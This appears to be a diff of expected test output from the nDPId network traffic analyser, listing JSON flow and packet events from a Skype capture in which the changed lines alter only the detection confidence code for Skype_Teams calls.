00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2RjwAAEAR6djAqAEinTfroDLdnFYAIpfGe58CtglNf35c9xed\/TOYZPtdg4AQKYWmKBE="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5iSIAAEARWf7AqAEinTc4kjLdnF4AJWUse6ECi+HEJAzVpo3ery\/yzADPEQnmy2088qUgojE="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+xqAAAEAR0mLAqAEinTeCqjLdnFIAKv3he6MC3h4IlBBBiQEMzD2u81WGXlCVYngNZSbA0YydRzOnaw=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyXBgAAEARPQLAqAEinTeCnzLdnFAAHlQNe6UCbRCk9Zm0qay7l4LGg8ZPRvGp2A=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAABATykAAEARrDLAqAEib91NqjLdnFUALAKIe6cC06nLoifBCja4NtBTBPAIMkjY1r+eVyo0K906xL\/RnajP"} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1431970678945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970678945,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISqNoAAEARDjfAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1431970678946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970678946,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISZSMAAEARj0bAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/p1UAAEAR8T7AqAEiQTffGDLdnF0AK+jLe6kC6fGNK2goAXsNse6RdApll6kRm4bOwgAP2hC\/D2eOAyk="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7GMMAAEARF0\/AqAEinTfrnjLdnFsAJ5Hde6sCJ8R84KyvegILw5PDMDyyzP0qbIKzwXJl3e6CLA=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA49SsAAEARo3fAqAEiQTffEDLdnGAAJBSJe60CT4+h0ZiCfQwqP7NMcZ5acjfF0jfx+oM28A=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431970679027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970679027,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISpvoAAEARD93AqAFc\/\/\/\/\/0RcRFwB\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"} 
